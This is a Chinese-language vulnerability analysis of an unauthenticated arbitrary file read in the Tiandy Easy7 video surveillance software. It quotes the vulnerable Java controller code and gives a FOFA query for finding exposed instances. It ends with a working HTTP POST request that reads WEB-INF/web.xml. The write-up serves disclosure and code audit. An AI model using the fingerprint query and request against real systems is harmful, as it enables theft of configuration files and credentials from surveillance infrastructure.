漏洞简介
天地伟业Easy7是一款用于视频监控管理的软件系统。
该系统的/Easy7/rest/gis/exportGisObj 和 /Easy7/rest/gisCore/exportGisObj接口存在前台任意文件读取漏洞,攻击者通过构造恶意路径参数(如WEB-INF/web.xml)可读取服务器上的任意文件,可能导致敏感信息泄露(如系统配置文件、用户凭证等)。由于天地伟业产品多用于关键基础设施领域,若存在公网暴露实例,可能带来严重的安全风险。
影响版本
fofa语法
body="/Easy7/apps/WebService/LogIn.jsp" || body="Easy7/VideoLib.EXE" || body="/Easy7/index.html" || (body="<img src=\"./images/ico/Easy7_logo_transparent.png") && title="平台"
漏洞分析
首先,该系统基于Spring 3.0,比较古老且WEB-INF/web.xml里没有配置任何filter进行权限校验,因此绝大部分接口都是可以直接访问的。
再来看本次的漏洞接口 /Easy7/rest/gis/exportGisObj 和 /Easy7/rest/gisCore/exportGisObj (这是审计时额外发现的,漏洞通告只有前者,可能是不同版本的区别)的对应方法exportGisObj()的实现逻辑
其中一个路径来自 com.tiandy.easy7.core.rest.CLS_REST_Gis#exportGisObj
@Controller
@RequestMapping({"/gis"})
public class CLS_REST_Gis {
@Resource(
name = "boGis"
)
private CLS_BO_Gis boGis;
static WritableWorkbook wwb;
@RequestMapping({"/exportGisObj"})
public void exportGisObj(HttpServletRequest request, HttpServletResponse response, CLS_VO_Obj_ObjGis voObjGisObj) throws Exception {
String filePath = request.getRealPath("/");
String fileName = voObjGisObj.getFileName();
if (null != fileName && !"".equals(fileName)) {
Tools.outFile(response, fileName, filePath + fileName);
} else {
response.getWriter().println(JSONObject.fromObject(this.boGis.exportGisObj(voObjGisObj, filePath)));
}
}
另一个路径来自 com.tiandy.easy7.core.rest.CLS_REST_GisCore#exportGisObj 二者实现是一样的,只是来自不同的接口而已。
其中 request.getRealPath("/")获取的结果是当前应用的根目录,voObjGisObj.getFileName()返回的是用户传递的fileName参数;
其次,根据代码实现逻辑,我们需要跟进 Tools.outFile() 方法
public static void outFile(HttpServletResponse resp, String fileName, String fileUrl) throws IOException {
ServletOutputStream out = resp.getOutputStream();
fileName = URLEncoder.encode(fileName, "UTF-8");
resp.setHeader("Content-disposition", "attachment;filename=" + fileName);
BufferedInputStream bis = null;
BufferedOutputStream bos = null;
try {
InputStream inputStream = new FileInputStream(fileUrl);
bis = new BufferedInputStream(inputStream);
bos = new BufferedOutputStream(out);
byte[] buff = new byte[2048];
int bytesRead;
while((bytesRead = bis.read(buff, 0, buff.length)) != -1) {
bos.write(buff, 0, bytesRead);
}
到这里,这个文件读取漏洞的成因就非常清楚了:用户请求传递fileName参数,被直接拼接到new FileInputStream(fileUrl) fileUrl 部分进行文件操作,整个过程无任何校验或过滤,因此造成任意文件读取漏洞。
漏洞复现
POST /Easy7/rest/gis/exportGisObj HTTP/1.1
Host: easy7.mrxn.net
Content-Type: application/x-www-form-urlencoded
fileName=WEB-INF/web.xml

成功读取到WEB-INF/web.xml文件内容


